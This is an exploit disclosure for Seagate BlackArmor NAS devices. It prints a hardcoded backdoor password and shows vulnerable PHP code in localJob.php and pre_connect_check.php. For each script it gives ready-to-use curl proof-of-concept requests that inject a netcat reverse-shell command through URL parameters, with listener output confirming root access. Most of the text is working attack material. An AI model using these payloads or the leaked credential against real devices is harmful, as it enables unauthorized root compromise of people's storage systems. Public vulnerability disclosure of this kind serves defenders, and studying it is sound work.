# Exploit Title: Seagate BlackArmor NAS Multiple Vulnerabilities
# Date: 2/17/14
# Exploit Author: Shayan Sadigh (twitter.com/r1pplex) | <ienjoy.ripples@gmail.com>
# Vendor Homepage: http://www.seagate.com/external-hard-drives/network-storage/
# Version: All BlackArmor NAS devices..
# Tested on: Linux
# CVE : N/A
1. some sort of backdoor user (hardcoded credentials) in backupmgt/pre_connect_check.php
$password = '!~@#$EW#$$%FREDESWWSED';
/////////////////////////////////////////////////////////////////////////////////////////////////////////
2. remote [root] code execution, this software is riddled with many many bugs, including tons of rce..
examples: localhost/backupmgt/localJob.php
Vulnerable code:
$session = $_GET["session"];
$tempsrc = exec("cat $immedLog | grep $session | cut -d '".Chr(002)."' -f 3");
$des = exec("cat $immedLog | grep $session | cut -d '".Chr(002)."' -f 4");
PoC: curl "localhost/backupmgt/localJob.php?session=fail;nc -e 127.0.0.1 99;"
-------------------------
listening on [any] 99 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 57157
id
uid=0(root) gid=0(root)
another example: localhost/backupmgmt/pre_connect_check.php
Vulnerable code:
$ipString = $_GET["server_ip"];
$auth_name = $_GET["auth_name"];
$password = $_GET["auth_pass"];
$alias_name = $_GET["alias_name"];
$dryString ="rsync -rnP --password-file=temp.pas"." --log-file=pre.log --contimeout=5 /usr/sbin ".$auth_name."@".$ipString."::".$alias_name;
$result =@exec ($dryString); // produce temp pre log
PoC: curl "localhost/backupmgt/pre_connect_check.php?auth_name=fail;nc -e 127.0.0.1 99;"
-------------------------
listening on [any] 99 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 52348
id
uid=0(root) gid=0(root)
There's ton of more bugs in BlackArmor NAS software, there have been other releases noting other bugs (killProcesses.php RCE), Seagate has decided to ignore any messages regarding these..claiming they are only working on newer products now.
